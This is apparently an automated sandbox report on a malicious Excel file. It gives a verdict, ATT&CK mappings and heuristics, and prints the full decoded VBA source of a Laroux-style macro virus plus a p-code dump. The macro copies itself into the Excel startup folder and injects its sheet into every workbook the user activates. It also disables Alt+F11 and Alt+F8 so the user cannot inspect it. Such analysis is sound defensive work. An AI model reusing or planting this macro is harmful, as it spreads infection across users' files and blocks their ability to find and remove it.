Verdict: MALICIOUS
Risk Score: 88

Malware Insights
MITRE ATT&CK:
- T1059.005 Visual Basic
- T1547.001 Registry Run Keys / Startup Folder
The sample is an Excel document containing VBA macros. The 'auto_open' macro attempts to copy itself to the Excel startup path as 'StartUp.xls' and registers a macro ('cop') to be executed when a sheet is activated. This indicates an attempt to establish persistence. The ClamAV detection 'Doc.Macro.Laroux-5893719-0' further supports its malicious nature.
Heuristics (3)
- ClamAV: Doc.Macro.Laroux-5893719-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Macro.Laroux-5893719-0
- VBA macros detected (medium, 1 related finding, OLE_VBA_MACROS): Document contains VBA macro code
- Auto_Open macro (low, OLE_VBA_AUTO): Auto_Open macro. Matched line in script: `Sub auto_open()`
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 4375 bytes |

SHA-256: 7becd64b7e662002ddf9bee153fe1b0a94f0320a313b4687f5cde7dad51afc25
Preview script: first 1,000 lines of the extracted script

```vba
Attribute VB_Name = "StartUp"
Sub auto_open()
Attribute auto_open.VB_ProcData.VB_Invoke_Func = " \n14"
On Error Resume Next
If ThisWorkbook.Path <> Application.StartupPath And Dir(Application.StartupPath & "\" & "StartUp.xls") = "" Then
Application.ScreenUpdating = False
ThisWorkbook.Sheets("StartUp").Copy
ActiveWorkbook.SaveAs (Application.StartupPath & "\" & "StartUp.xls")
n$ = ActiveWorkbook.Name
ActiveWindow.Visible = False
Workbooks("StartUp.xls").Save
Workbooks(n$).Close (False)
End If
Application.OnSheetActivate = "StartUp.xls!cop"
Application.OnKey "%{F11}", "StartUp.xls!escape"
Application.OnKey "%{F8}", "StartUp.xls!escape"
End Sub
Sub cop()
Attribute cop.VB_ProcData.VB_Invoke_Func = " \n14"
On Error Resume Next
If ActiveWorkbook.Sheets(1).Name <> "StartUp" Then
Application.ScreenUpdating = False
n$ = ActiveSheet.Name
Workbooks("StartUp.xls").Sheets("StartUp").Copy before:=Worksheets(1)
Sheets(n$).Select
End If
End Sub
Sub back()
Attribute back.VB_ProcData.VB_Invoke_Func = " \n14"
On Error Resume Next
Application.OnKey "%{F8}", "StartUp.xls!escape"
Application.OnKey "%{F11}", "StartUp.xls!escape"
Application.OnSheetActivate = "StartUp.xls!cop"
Application.OnTime Now + TimeValue("00:00:01"), "StartUp.xls!cop"
Workbooks.Open Application.StartupPath & "\StartUp.xls"
End Sub
' Processing file: /opt/analyzer/scan_staging/d5e8dddd939b41119bc0471911d92b2e.bin
' ===============================================================================
' Module streams:
' _VBA_PROJECT_CUR/VBA/StartUp - 2802 bytes
' Line #0:
' FuncDefn (Sub StartupPath())
' Line #1:
' OnError (Resume Next)
' Line #2:
' Ld ScreenUpdating
' MemLd Sheets
' Ld Copy
' MemLd ActiveWorkbook
' Ne
' Ld Copy
' MemLd ActiveWorkbook
' LitStr 0x0001 "\"
' Concat
' LitStr 0x000B "StartUp.xls"
' Concat
' ArgsLd Dir 0x0001
' LitStr 0x0000 ""
' Eq
' And
' IfBlock
' Line #3:
' LitVarSpecial (False)
' Ld Copy
' MemSt SaveAs
' Line #4:
' LitStr 0x0007 "StartUp"
' Ld ScreenUpdating
' ArgsMemLd n 0x0001
' ArgsMemCall ActiveWindow 0x0000
' Line #5:
' Ld Copy
' MemLd ActiveWorkbook
' LitStr 0x0001 "\"
' Concat
' LitStr 0x000B "StartUp.xls"
' Concat
' Paren
' Ld Visible
' ArgsMemCall Workbooks 0x0001
' Line #6:
' Ld Visible
' MemLd Name
' St Save$
' Line #7:
' LitVarSpecial (False)
' Ld OnSheetActivate
' MemSt OnKey
' Line #8:
' LitStr 0x000B "StartUp.xls"
' ArgsLd cop 0x0001
' ArgsMemCall ActiveSheet 0x0000
' Line #9:
' LitVarSpecial (False)
' Paren
' Ld Save$
' ArgsLd cop 0x0001
' ArgsMemCall Close 0x0001
' Line #10:
' EndIfBlock
' Line #11:
' LitStr 0x000F "StartUp.xls!cop"
' Ld Copy
' MemSt before
' Line #12:
' LitStr 0x0006 "%{F11}"
' LitStr 0x0012 "StartUp.xls!escape"
' Ld Copy
' ArgsMemCall Worksheets 0x0002
' Line #13:
' LitStr 0x0005 "%{F8}"
' LitStr 0x0012 "StartUp.xls!escape"
' Ld Copy
' ArgsMemCall Worksheets 0x0002
' Line #14:
' EndSub
' Line #15:
' FuncDefn (Sub back())
' Line #16:
' OnError (Resume Next)
' Line #17:
' LitDI2 0x0001
' Ld Visible
' ArgsMemLd n 0x0001
' MemLd Name
' LitStr 0x0007 "StartUp"
' Ne
' IfBlock
' Line #18:
' LitVarSpecial (False)
' Ld Copy
' MemSt SaveAs
' Line #19:
' Ld OnTime
' MemLd Name
' St Save$
' Line #20:
' LitDI2 0x0001
' ArgsLd TimeValue 0x0001
' ParamNamed Now
' LitStr 0x0007 "StartUp"
' LitStr 0x000B "StartUp.xls"
' ArgsLd cop 0x0001
' ArgsMemLd n 0x0001
' ArgsMemCall ActiveWindow 0x0001
' Line #21:
' Ld Save$
' ArgsLd n 0x0001
' ArgsMemCall Select 0x0000
' Line #22:
' EndIfBlock
' Line #23:
' EndSub
' Line #24:
' FuncDefn (Sub id_0250())
' Line #25:
' OnError (Resume Next)
' Line #26:
' LitStr 0x0005 "%{F8}"
' LitStr 0x0012 "StartUp.xls!escape"
' Ld Copy
' ArgsMemCall Worksheets 0x0002
' Line #27:
' LitStr 0x0006 "%{F11}"
' LitStr 0x0012 "StartUp.xls!escape"
' Ld Copy
' ArgsMemCall Worksheets 0x0002
' Line #28:
' LitStr 0x000F "StartUp.xls!cop"
' Ld Copy
' MemSt before
' Line #29:
' Ld id_0254
' LitStr 0x0008 "00:00:01"
' ArgsLd id_0256 0x0001
' Add
' LitStr 0x000F "StartUp.xls!cop"
' Ld Copy
' ArgsMemCall id_0252 0x0002
' Line #30:
' Ld Copy
' MemLd ActiveWorkbook
' LitStr 0x000C "\StartUp.xls"
' Concat
' Ld cop
' ArgsMemCall Open 0x0001
' Line #31:
' EndSub
```